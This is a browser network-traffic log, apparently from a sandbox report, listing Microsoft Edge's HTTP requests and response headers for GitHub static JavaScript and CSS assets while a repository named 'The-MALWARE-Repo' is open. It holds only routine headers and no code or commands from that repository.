vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e47187ab6990fcd667a1d3fcc8a2cd3d74d25942
content-length: 544
GET

https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-abc100eaa2cb.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-app_components_search_custom-scopes-element_ts-abc100eaa2cb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB2073226E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kcgs7200119-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 35, 13308
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 12b7ddffce6111f47d2f1bedc55a3d7566159ddd
content-length: 4101
GET

https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 06 Dec 2024 19:19:22 GMT
etag: "0x8DD162AE3C55516"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2490244
x-served-by: cache-iad-kiad7000044-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 21, 12799
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 79070da9de95a7cbdcb66158aa60b7e34bc41975
content-length: 6323
GET

https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-b492d6900d5e.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_query-builder-element_query-builder-element_ts-b492d6900d5e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 02:09:02 GMT
etag: "0x8DD5D1D07C1610E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 382742
x-served-by: cache-iad-kcgs7200022-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 27, 4706
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 27e471af9fe7c1f3beced0cf135e4a94efe06b19
content-length: 7505
GET

https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-91468a3354f9.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-91468a3354f9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:49 GMT
etag: "0x8DD4BAB1F42AF08"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kiad7000068-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 35, 13382
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8aa9ff32310206b8818c541bfa6bbd7e5fa794a4
content-length: 5570
GET

https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-880f27a93f7b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-880f27a93f7b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 13 Feb 2025 15:14:50 GMT
etag: "0x8DD4C41292E5E2A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kjyo7100100-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 35, 13268
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0540a943b3eeb47719f86ba08907e6a55bf6786e
content-length: 4438
GET

https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-cf531d29cf91.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-app_components_search_qbsearch-input-element_ts-cf531d29cf91.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 10 Mar 2025 20:02:55 GMT
etag: "0x8DD600E8BF8D0F4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 19691
x-served-by: cache-iad-kcgs7200120-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 38, 300
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 241cbdb58e1946cf51abbec3b1de180fff0a00ca
content-length: 17020
GET

https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-8ca582ddd98a.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-8ca582ddd98a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB20A937F6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kcgs7200107-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 33, 14488
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 57d343bcf0e124ecdef0bb25fcba2c2304af8238
content-length: 2913
GET

https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-04338159da93.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-04338159da93.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB20A91111"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199444
x-served-by: cache-iad-kiad7000059-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 36, 14621
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7daec4f38294d6bb5c51d10cda9ceb1885b1d66d
content-length: 3160
GET

https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 06 Dec 2024 19:19:22 GMT
etag: "0x8DD162AE3BAD98C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 3694313
x-served-by: cache-iad-kiad7000114-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 21, 12787
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b88e34df85f5ad35a7fea4b08d25a25aa8470d1b
content-length: 5020
GET

https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-37a12a0ee62c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-37a12a0ee62c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 13 Feb 2025 15:14:50 GMT
etag: "0x8DD4C41292FE316"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199444
x-served-by: cache-iad-kcgs7200097-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 35, 13242
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9c683f45df27565fad1ed94a1fd7806897e5bf8f
content-length: 2521
GET

https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-c4e5a9b4f95a.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-c4e5a9b4f95a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB20C138E3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kiad7000148-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 36, 14778
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d743d7f88c9a3f7d0867a399614127868fafdfb4
content-length: 2844
GET

https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-cd101f502904.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-cd101f502904.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 06 Mar 2025 22:39:41 GMT
etag: "0x8DD5CFFC8E15013"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 375302
x-served-by: cache-iad-kjyo7100128-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 18, 3053
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 834e69809bff7dd460959d94e012a5e04ef05378
content-length: 5408
GET

https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:32 GMT
etag: "0x8DD02B44AD10969"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 3673216
x-served-by: cache-iad-kjyo7100146-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 6447, 13854
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5dcc7b58b47126a9e2b79c8716cff869b47d5e68
content-length: 9421
GET

https://github.githubassets.com/assets/react-code-view.a0633e3d36c876a6eaa1.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/react-code-view.a0633e3d36c876a6eaa1.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Thu, 06 Mar 2025 17:41:31 GMT
etag: "0x8DD5CD6217C4ECD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 450845
x-served-by: cache-iad-kjyo7100068-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 18, 2201
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d09ed350778f5e8043c43a591fccd56699751d2a
content-length: 1194
GET

https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:31 GMT
etag: "0x8DD34DA6E0E2A39"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 1269024
x-served-by: cache-iad-kiad7000090-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 31, 6485
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 065cda5a4ba426bd30764679932c39f7793d45f2
content-length: 2138
GET

https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 16 Sep 2024 23:19:54 GMT
etag: "0x8DCD6A6128E8C4A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 1439484
x-served-by: cache-iad-kiad7000157-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 1588, 6447
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9522ea2f07e1bd3369f4e36378914eada9a6318f
content-length: 2209
GET

https://github.githubassets.com/assets/ui_packages_diffs_diff-parts_ts-ui_packages_use-file-tree-tooltip_use-file-tree-tooltip_ts-ui-db0a92-6a1f23f93999.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_diffs_diff-parts_ts-ui_packages_use-file-tree-tooltip_use-file-tree-tooltip_ts-ui-db0a92-6a1f23f93999.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 03 Mar 2025 23:42:13 GMT
etag: "0x8DD5AAD05E7147D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 696662
x-served-by: cache-iad-kcgs7200135-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 68, 3580
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3f904c014763b72b2d376ac6c298cb8481869eb2
content-length: 7821
GET

https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_utili-04c5c0-190ff749ae90.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_utili-04c5c0-190ff749ae90.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 19:44:16 GMT
etag: "0x8DD5DB0723BC277"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 360782
x-served-by: cache-iad-kjyo7100149-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 85, 1805
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 61b718bfb097428980ee561fca74bd35020978d3
content-length: 17842
GET

https://github.githubassets.com/assets/react-code-view-8aa6620a8c56.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/react-code-view-8aa6620a8c56.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
